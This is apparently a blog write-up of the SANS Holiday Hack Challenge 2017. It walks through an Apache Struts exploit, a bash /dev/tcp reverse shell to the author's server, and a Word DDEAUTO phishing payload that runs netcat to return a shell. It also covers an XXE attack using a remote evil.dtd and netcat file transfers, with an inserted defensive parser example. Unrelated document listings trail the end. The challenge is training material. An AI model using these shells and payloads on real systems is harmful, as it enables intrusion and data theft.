HHC 2017 writeup, by RedTeam611
- Adam Evans
- 5 years ago
After you complete the terminal challenges in the snowball games, you move on to the web server challenges.

Our first task is to investigate the Letters to Santa application at
What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?

This website is public and internet-facing. When visiting the site you notice it might be SQL injectable or be open to other types of exploits. But a quick look at the page source shows us a URL leading to the Dev server located at
When browsing to the Dev server [ we can see they have a toy ordering system. According to the hints, this site is exploitable via Apache Struts CVE
The SANS hints link us to a blog showing how to edit an Apache Struts Python exploit. We will use this Python exploit and tweak some of its commands.
Note: We will need to fire up a VPS with the Python script installed on it. VPSs are easier to work with because they have public IP addresses, and catching a reverse shell on one is easier than setting up port forwarding on your router at home, assuming you have access to your router.

If we use the syntax for the Python script, you will see the payload [whoami] executed, but it does not return any information. How do we know the command [whoami] is being executed on the server? One way to test this would be to create a test file in the web server folder that we can then browse to in Firefox and download. I didn't go this route and tested with a reverse shell.

We will need 2 windows open for our reverse shell: one to send the Python script and one to catch the shell, if successful. I usually use Pentest Monkey's cheat sheet for reverse shells.

We will be using the Python command

    python cve py -u -c "bash -i >& /dev/tcp/ /1337 0>&1"

Our VPS is using the IP and we will be using port 1337 ;)

The command [bash -i >& /dev/tcp/ /1337 0>&1] sends a reverse shell to our VPS and, as you can see in the screenshot, the command is executed successfully and we are now in the system/Dev server.
Our next step once in the Dev server is to find Alabaster Snowball's password. We can see from our Elf hints that developers sometimes hard-code credentials into their development files. In this case Alabaster most likely did this. If we Google which folder developers keep their files in, we are led to the /opt directory. We will use a recursive grep looking for the user name alabaster.

    [grep -nr 'alabaster*' .]

We can now see the username string [alabaster_snowball] was found in a .class file, and if we open that file we can see his password. We have found his password of [ stream_unhappy_buy_loss ]

2) Next we will move on to the SMB server.

The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?
The first thing we need to do is an Nmap scan of the network to get an idea of what's around internally. We will start with [nmap ]. This will scan the subnet from .1 to .255.

    alabaster_snowball@l2s:/$ nmap nmap
    Starting Nmap 7.40 ( ) at :26 UTC

    Nmap scan report for hhc17-l2s-proxy.c.holidayhack2017.internal ( )
    Host is up ( s latency).
    Not shown: 996 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    443/tcp open https
    2222/tcp open EtherNetIP-1

    Nmap scan report for hhc17-apache-struts1.c.holidayhack2017.internal ( )
    Host is up ( s latency).
    Not shown: 998 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http

    Nmap scan report for mail.northpolechristmastown.com ( )
    Host is up ( s latency).
    Not shown: 994 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    25/tcp open smtp
    80/tcp open http
    143/tcp open imap
    2525/tcp open ms-v-worlds
    3000/tcp open ppp

    Nmap scan report for edb.northpolechristmastown.com ( )
    Host is up ( s latency).
    Not shown: 996 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    389/tcp filtered ldap
    8080/tcp open http-proxy

    Nmap scan report for hhc17-emi.c.holidayhack2017.internal ( )
    Host is up ( s latency).
    Not shown: 995 closed ports
    PORT STATE SERVICE
    80/tcp open http
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    3389/tcp open ms-wbt-server

    Nmap scan report for hhc17-apache-struts2.c.holidayhack2017.internal ( )
    Host is up ( s latency).
    Not shown: 996 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    5678/tcp open rrac
    8082/tcp open blackice-alerts

    Nmap scan report for eaas.northpolechristmastown.com ( )
    Host is up (0.0012s latency).
    Not shown: 998 filtered ports
    PORT STATE SERVICE
    80/tcp open http
    3389/tcp open ms-wbt-server

    Nmap done: 255 IP addresses (7 hosts up) scanned in 8.56 seconds

As we can see from the Nmap output, the IP has port 445 open, indicating it has SMB open. But if we try to access this SMB server with Alabaster's user name and password we will be denied. This server is meant to throw you off.

The Elf hint tells us there is a hidden SMB server, and we must change our Nmap command to find it. Using the command [nmap -PS ] we can see there is another SMB server. This definitely shows us it is the right server: it's named SMB SERVER! DERP!
    hhc17-smb-server.c.holidayhack2017.internal ( )

In order to access this server we will have to use some port forwarding. If we ping the Dev server URL at dev.northpolechristmastown.com, it will return the public IP address for the server, which is
We can log in to the Dev server with port forwarding, which then sends us to the SMB server, using Alabaster's password stream_unhappy_buy_loss.

    [ ssh -L :445: :445 alabaster_snowball@ ]

Once connected we will use the smbclient command to find the shares available. The -L option lists the shares available to the username Alabaster_Snowball.

    [ smbclient -L U alabaster_snowball ]

We can see that Filestor is the share name we most likely need to investigate. We log in to the SMB server with password reuse and can then see our next flag, GreatBookPage 3.
3) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at
What can you learn from The Great Book page found in an on that server?

Our next step is to access the Elf server. As we can see from our Nmap scan of IP ports 80 and 3000 are open. They are associated with a web server. If you SSH forward to port 80 you will get a default Apache Ubuntu page, which tells you you're using the wrong port. We need to forward to port 3000, not 80.

    Nmap scan report for mail.northpolechristmastown.com ( )
    Host is up ( s latency).
    Not shown: 994 closed ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    25/tcp open smtp Postfix smtpd
    80/tcp open http nginx (Ubuntu)
    143/tcp open imap Dovecot imapd
    2525/tcp open smtp Postfix smtpd
    3000/tcp open http Node.js Express framework
    Service Info: Host: mail.northpolechristmastown.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We will use the following command to set up the SSH tunnel. It basically says to forward our localhost port 8080 to port 3000 through our SSH tunnel.

    ssh -L 8080:mail.northpolechristmastown.com:3000 alabaster_snowball@

As you can see, we now have access to the EWA, which is a knock-off of Microsoft OWA. After getting to the EWA login there is a challenge to build the cookie to log in. I had someone help me with this and/or give me the answer, as I was not smart enough to figure it out. So basically our cookie needs to look like this. The cookie to build is located at localhost:8080/cookie.txt
We download the cookie manager plug-in for Firefox and add the following cookie to the content area.

    AAAAAAAAAAAAAAAAA"}

After we do this we save it and press F5 to refresh and log in as Alabaster.

Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?

When going through Alabaster's we can see that he wants a gingerbread cookie recipe in a docx file. If we send this file to his email he will open it, and we will phish him with a DDE exploit.
In the screenshot above, Alabaster hints that he has Netcat installed on his system. We will use this for the DDE attack. As I am typing this report on Kali, I will not have the screenshot for MS Word. The syntax for the DDE we will use will be

    DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc.exe e cmd.exe"

Since Alabaster has netcat on his system, this command will execute netcat to connect to our VPS and return the command prompt.
Once in the EMI server we can grab our flag for GreatBookPage 7. GreatBookPage 7 is the last book to get. Tracking back to GreatBookPage 6, we now go to the last challenge we needed to complete.

The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at
Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

We will get to the EaaS service with port forwarding once again, with

    ssh -L 8080:eaas.northpolechristmastown.com:80 alabaster_snowball@ pw=stream_unhappy_buy_loss

This is located internally at eaas.northpolechristmastown.com or the IP.
The EaaS site uses XML data to manage requests from other teams. There is a sample request layout available that you can download. Teams just customize the XML and submit. XML processing can be complex. SANS has a blog post about how to carry out XML attacks. On this site we will edit some of the sample XML code they use and use it on the EaaS server. The challenge states to get the GreatBookPage 6 information from the c:\greatbook.txt path. We will use this path in our XML exploit.
1. We upload our edited XML payload, which points the system to load a DTD file from our remote web server/VPS.
2. The XML parser reaches out to the designated VPS/web server to retrieve the DTD contents.
3. The XML parser loads the contents of the DTD into the pre-processing of the original XML payload and returns us the results of c:\greatbook.txt
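A parser-side mitigation for the flow in the three steps above, as an added example that is not part of the original writeup and not the EaaS server's code: an untrusted XML request is parsed with every DOCTYPE and entity declaration refused, so the parser never gets as far as loading a remote DTD. The request layout, element names and the example.invalid URL are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when a request carries a DOCTYPE or any entity declaration."""


def _forbid(what):
    """Build an expat handler that aborts parsing as soon as it fires."""
    def handler(*args):
        raise DTDForbidden(f"{what} not allowed in requests")
    return handler


def parse_request(xml_bytes):
    """Parse an untrusted request into a list of {field: value} records.

    expat never fetches remote resources on its own, but a DTD is still the
    entry point for entity tricks, so the whole construct is rejected.
    """
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()
    # Reject at the earliest point: the DOCTYPE line itself.
    parser.StartDoctypeDeclHandler = _forbid("DOCTYPE declaration")
    # Defence in depth in case a declaration is reached another way.
    parser.EntityDeclHandler = _forbid("entity declaration")
    parser.UnparsedEntityDeclHandler = _forbid("unparsed entity declaration")
    parser.ExternalEntityRefHandler = _forbid("external entity reference")
    # Ordinary content is handed to ElementTree's tree builder.
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(xml_bytes, True)
    root = builder.close()
    return [
        {field.tag: (field.text or "").strip() for field in elf}
        for elf in root.findall("Elf")
    ]


def check_request(xml_bytes):
    """Return (True, records) or (False, reason) so the caller can log the reason."""
    try:
        return True, parse_request(xml_bytes)
    except DTDForbidden as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"


# Constructed sample request (hypothetical layout).
SAMPLE_REQUEST = (
    b'<?xml version="1.0"?>\n'
    b"<Elves>\n"
    b"  <Elf><ElfID>1</ElfID><ElfName>Example Elf</ElfName></Elf>\n"
    b"  <Elf><ElfID>2</ElfID><ElfName>Second Elf</ElfName></Elf>\n"
    b"</Elves>\n"
)

# Constructed sample: the same request with a DOCTYPE pointing at a remote DTD.
SAMPLE_WITH_DTD = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE Elves SYSTEM "http://dtd.example.invalid/evil.dtd">\n'
    b"<Elves>\n"
    b"  <Elf><ElfID>1</ElfID><ElfName>Example Elf</ElfName></Elf>\n"
    b"</Elves>\n"
)

if __name__ == "__main__":
    print(check_request(SAMPLE_REQUEST))
    print(check_request(SAMPLE_WITH_DTD))
```
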
As we can see from the screenshot, on the right the EaaS server downloads evil.dtd from our VPS web server on port 8080, and on the left it returns the results from the c:\greatbook.txt file on port
We then get the path to GreatBookPage6.

We have successfully captured all the GreatBook flags for the HHC!

Tips and tricks

1) Use certutil to get the SHA1 hash of a file in Windows CMD.
   Example: [ C:\>certutil -hashfile GreatBookPage7.pdf SHA1 ]
2) Use sha1sum to get the SHA1 hash of the GreatBook to upload to achievements.
   Example: [ sha1sum GreatBook.pdf ]
3) Use netcat to transfer files with Windows.
   Example: [ nc.exe -w < GreatBookPage7.pdf ] -- Send
   Example: [ nc -l -p 1338 > GreatBookPage7.pdf ] -- Receive
More informationDreamweaver is a full-featured Web application
Create a Dreamweaver Site Dreamweaver is a full-featured Web application development tool. Dreamweaver s features not only assist you with creating and editing Web pages, but also with managing and maintaining
More informationHost Identity Sources
The following topics provide information on host identity sources: Overview: Host Data Collection, on page 1 Determining Which Host Operating Systems the System Can Detect, on page 2 Identifying Host Operating
More informationContents. Note: pay attention to where you are. Note: Plaintext version. Note: pay attention to where you are... 1 Note: Plaintext version...
Contents Note: pay attention to where you are........................................... 1 Note: Plaintext version................................................... 1 Hello World of the Bash shell 2 Accessing
More informationChange Management: DYNAMIC NETWORK MAPPING. LinuxWorld San Francisco Security Track. Presented by Joshua D. Abraham.
Change Management: DYNAMIC NETWORK MAPPING LinuxWorld San Francisco Security Track Presented by Joshua D. Abraham August 16th 2006 jabra@ccs.neu.edu Northeastern University Agenda How do we scan? What
More informationHackveda Training - Ethical Hacking, Networking & Security
Hackveda Training - Ethical Hacking, Networking & Security Day1: Hacking windows 7 / 8 system and security Part1 a.) Windows Login Password Bypass manually without CD / DVD b.) Windows Login Password Bypass
More informationSBCC Web File System - Xythos
Table of Contents Table of Contents...1 Purpose...1 Login Procedure...1 Creating and Sharing a Web Folder for MAT153...2 Dreamweaver Remote Info...4 I Forgot My Pipeline Credentials...6 Purpose This purpose
More informationIntegrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,
More informationH1-212 Capture the Flag Solution Author: Corben Douglas
H1-212 Capture the Flag Solution Author: Corben Douglas (@sxcurity) Description: An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident
More informationDCLI User's Guide. Data Center Command-Line Interface 2.9.1
Data Center Command-Line Interface 2.9.1 You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about this documentation, submit
More informationFtp Command Line Manual Windows Username Password Linux
Ftp Command Line Manual Windows Username Password Linux Midnight Commander is a console based full-screen text mode File Manager that allows you to copy, MC has many features which are useful for a user
More informationOracle Application Express: Administration 1-2
Oracle Application Express: Administration 1-2 The suggested course agenda is displayed in the slide. Each lesson, except the Course Overview, will be followed by practice time. Oracle Application Express:
More informationConfiguring RentalPoint Web Services
Table of Contents 1. What is RentalPoint Web Services? 2 2. How to Configure Your Server 2 2.1 Download and Install.NET Framework 4.5.1 2 2.2 Download and Install IIS 2 2.3 Download and Install RPWS Files
More informationQuestion No: 2 Which identifier is used to describe the application or process that submitted a log message?
Volume: 65 Questions Question No: 1 Which definition of a fork in Linux is true? A. daemon to execute scheduled commands B. parent directory name of a file pathname C. macros for manipulating CPU sets
More informationSQL Injection Attack Lab
SEED Labs SQL Injection Attack Lab 1 SQL Injection Attack Lab Copyright 2006-2016 Wenliang Du, Syracuse University. The development of this document was partially funded by the National Science Foundation
More informationPhishing Stories. Shaun Jones
Phishing Stories Shaun Jones Agenda What is Phishing? Phishing Story I Intranets are actually pretty useful Phishing Story II Why do I need two factor auth Phishing Story III Everybody gets shells! What
More informationLab 1: Creating Secure Architectures (Revision)
Lab 1: Creating Secure Architectures (Revision) A Challenge Our challenge is to setup MyBank Incorp, where each of you will be allocated a network and hosts to configure and get on-line (Figure 1). For
More informationWeb Attacks Lab. 35 Points Group Lab Due Date: Lesson 16
CS482 SQL and XSS Attack Lab AY172 1 Web Attacks Lab 35 Points Group Lab Due Date: Lesson 16 Derived from c 2006-2014 Wenliang Du, Syracuse University. Do not redistribute with explicit consent from MAJ
More informationMysql Tutorial Create Database Username Password Through Phpmyadmin
Mysql Tutorial Create Database Username Password Through Phpmyadmin Convert plain text to MD5 Hash and edit your MySQL Database. Every WordPress blog uses a MySQL Database which can be accessed through
More information